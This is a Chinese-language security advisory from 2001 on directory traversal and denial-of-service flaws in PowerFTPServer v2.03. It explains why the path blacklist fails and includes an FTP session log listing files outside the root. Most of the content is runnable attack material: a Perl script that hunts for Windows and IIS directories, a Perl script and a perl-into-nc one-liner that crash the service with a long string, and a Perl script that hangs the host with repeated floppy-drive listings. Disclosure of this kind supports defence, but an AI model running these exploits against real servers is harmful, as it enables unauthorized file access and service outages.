PowerFTPServer存在任意文件可查看和拒绝服务攻击
发布时间:2001-11-29
更新时间:2001-11-29
严重程度:中
威胁程度:远程非授权文件存取
错误类型:输入验证错误
利用方式:服务器模式
受影响系统
PowerFTPServer v2.03
详细描述
PowerFTP是Windows 9x/NT/2000下的一款FTP服务程序,其中存在漏洞可以导致任意用户遍历目录和查看任意文件。
从下面的测试记录可以看到,服务器只拒绝了 `.../.../` 这一种点号写法,而 `../../../../../../../` 和绝对路径 `c:/` 都未被拦截:路径检查只是针对单一模式的黑名单,并没有把请求路径规范化后再与 FTP 根目录比对。
测试代码
# uname -a
SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10
#
# ftp 10.0.0.1
Connected to 10.0.0.1.
220 Personal FTP Server ready
Name (10.0.0.1:root): temp
331 Password required for temp.
Password:
230 User temp logged in.
ftp>
ftp> pwd
257 "C:/WINDOWS/Application Data/Microsoft/Internet Explorer/Quick Launch/Mis documentos/tools/" is current directory.
ftp> cd .../.../
501 CWD failed. Cannot accept relative path using dot notation
ftp>
------oOo------
ftp> ls ../../../../../../../
200 Port command successful.
150 Opening data connection for directory list.
SUHDLOG.DAT COMMAND.COM BOOTLOG.PRV FRUNLOG.TXT DOS AUTOEXEC.DOS CONFIG.DOS VIDEOROM.BIN CONFIG.SYS DBLSPACE.BIN MSDOS.SYS MSDOS.--- SETUPLOG.TXT WINDOWS test.txt.txt
#
226 File sent ok
remote: ../../../../../../../
561 bytes received in 0.12 seconds (4.61 Kbytes/s)
ftp>
------oOo------
ftp> ls c:/
200 Port command successful.
150 Opening data connection for directory list.
SUHDLOG.DAT COMMAND.COM BOOTLOG.PRV FRUNLOG.TXT DOS [...]
------oOo------
------oOo-------------
Exploit Code PowerFTP_data.pl
------oOo-------------
#!/usr/bin/perl
# Simple script to view the files from the ftp server,
# even if they are outside of root directory.
#
# This script assume OS WinNT/2k/W.x and it looked
# for direcories of IIS.
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
# # # Usage: perl -x PowerFTP_data.pl -s <server> # # Examples: # # perl -x PowerFTP_data.pl -s 10.0.0.1 -l temp -p temp # perl -x PowerFTP_data.pl -s 10.0.0.1 # use Getopt::Std; use IO::Socket; print("\nPowerFTP server v2.03 Data revealing exploit (c)2001\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); getopts('s:l:p:',\%args); my ($CRLF,$port,$login,$pass,$win,$iis,@drives,$dir,$sock_res); $CRLF = "\015\012"; @drives = ("c","d","e"); #Possible drives remotes # If u needed read the drive A floopy add this line # @drives = ("a","c","d","e","f".......etc,etc $port = 21; $login = 'temp'; #Maybe u needed to change this $pass = 'temp'; #Maybe u needed to change this if (defined $args{s}) { $host = $args{s}; } else { print "No host specified.\n"; print "Usage: $0 -s <server> -l <user> -p <pass>\n\n";exit; } if (defined $args{l}) { $login = $args{l}; } if (defined $args{p}) { $pass = $args{p}; } $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) || die("Socket errors: $!"); $sock_res = <$sock>; print $sock "USER $login" . $CRLF; $sock_res = <$sock>; print $sock "PASS $pass" . $CRLF; $sock_res = <$sock>; if ($sock_res !~ /230\s/) { print "Login/password not accepted...exiting.\n"; close($sock); exit; } print $sock "PWD" . $CRLF; $sock_res = <$sock>; print "Attempting to locate system files..."; $win = &OS; $iis = &IIS; print "done..\n\n"; close($sock); print "Windows directory: $win\n"; print "IIS dorectory: $iis\n"; print "Try manually on FTPserver $host: dir c:/\n\n"; exit; sub OS { my @win_dirs = ("win","windows","winnt","winme"); foreach $drive (@drives) { foreach $dir (@win_dirs) { print "."; print $sock "NLST $drive:/$dir/" . $CRLF; $sock_res = <$sock>; if ($sock_res =~ /213\s/) {return("$drive:\\$dir");} } } return("not found"); } sub IIS { my @iis_files = ("Inetpub/wwwroot/", "Inetpub/wwwroot/cgi-bin/"); foreach $drive (@drives) { foreach $file (@iis_files) { print "."; print $sock "NLST $drive:/$file" . 
$CRLF; $sock_res = <$sock>; if ($sock_res =~ /213\s/) { $file =~ s/\//\\/g; return("$drive:\\$file"); } } } return("not found"); } ------oOo------ Remote Denial Of service ------oOo------ Proof Of concept # uname -a SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10 # # perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 21 220 Personal FTP Server ready # Crash system and the admin need restart the service! ------oOo------------- Exploit Code DoS PowerFTP_Dos.pl ------oOo------------- #!/usr/bin/perl # Simple script to send a long 'A^s' command to the server, # resulting in the ftpd crashing # # PowerFTP Server v2.03 proof-of-concept exploit # By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x PowerFTP_Dos.pl -s <server> # # Example: # # perl -x PowerFTP_Dos.pl -s 10.0.0.1 # 220 Personal FTP Server ready # Crash was successful ! # use Getopt::Std; use IO::Socket; print("\nPowerFTP server v2.03 DoS exploit (c)2001\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); getopts('s:', \%args); if(!defined($args{s})){&usage;} $serv = $args{s}; $foo = "A"; $number = 2048; $data .= $foo x $number; $EOL="\015\012"; $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $args{s}, PeerPort => "ftp(21)", ) || die("Unable to connect to ftp port at $args{s}\n"); $remote->autoflush(1); print $remote "$data". $EOL; while (<$remote>){ print } print("\nCrash was successful !\n"); sub usage {die("\nUsage: $0 -s <server>\n\n");} ------oOo------------- Exploit Code DoS attack floppy remote PowerFTP_floppy.pl ------oOo------------- #!/usr/bin/perl # # Even though the server will deny access, the slow hardware # will still hang the machine. 
This program attempts to # exploit this weakness by sending the 'NLST a:/' command to # the server # # PowerFTP Server v2.03 proof-of-concept exploit # By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x PowerFTP_floppy.pl <server> <port> <user> <pass> # # Example: # # perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp # use IO::Socket; print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); #$NUMBER_TO_SEND = 3000; $BUFF = 3000; if ( scalar @ARGV < 4 ) { print "Usage: $0 <server> <port> <user> <pass>\n"; exit(); } $target = $ARGV[ 0 ]; $port = $ARGV[ 1 ]; $username = $ARGV[ 2 ]; $password = $ARGV[ 3 ]; print "Creating socket... "; $sock = new IO::Socket::INET( PeerAddr => $target, PeerPort => int( $port ), Proto => 'tcp' ); die "$!" unless $sock; print "done.\n"; read( $sock, $buffer, 1 ); print "Sending username..."; print $sock "USER " . $username . "\n"; read( $sock, $buffer, 1 ); print "done.\n"; print "Sending password..."; print $sock "PASS " . $password . "\n"; read( $sock, $buffer, 1 ); print "done.\n"; print "DoS Attack floppy server..."; for( $i = 0; $i < $BUFF; $i++ ) { print $sock "NLST a:/\n"; read( $sock, $buffer, 1 ); } print "done.\n"; close( $sock ); exit(); ------oOo------------------------------------ 解决方案 尚无 相关信息 Alex Hernandez <al3xhernandez@ureach.com> |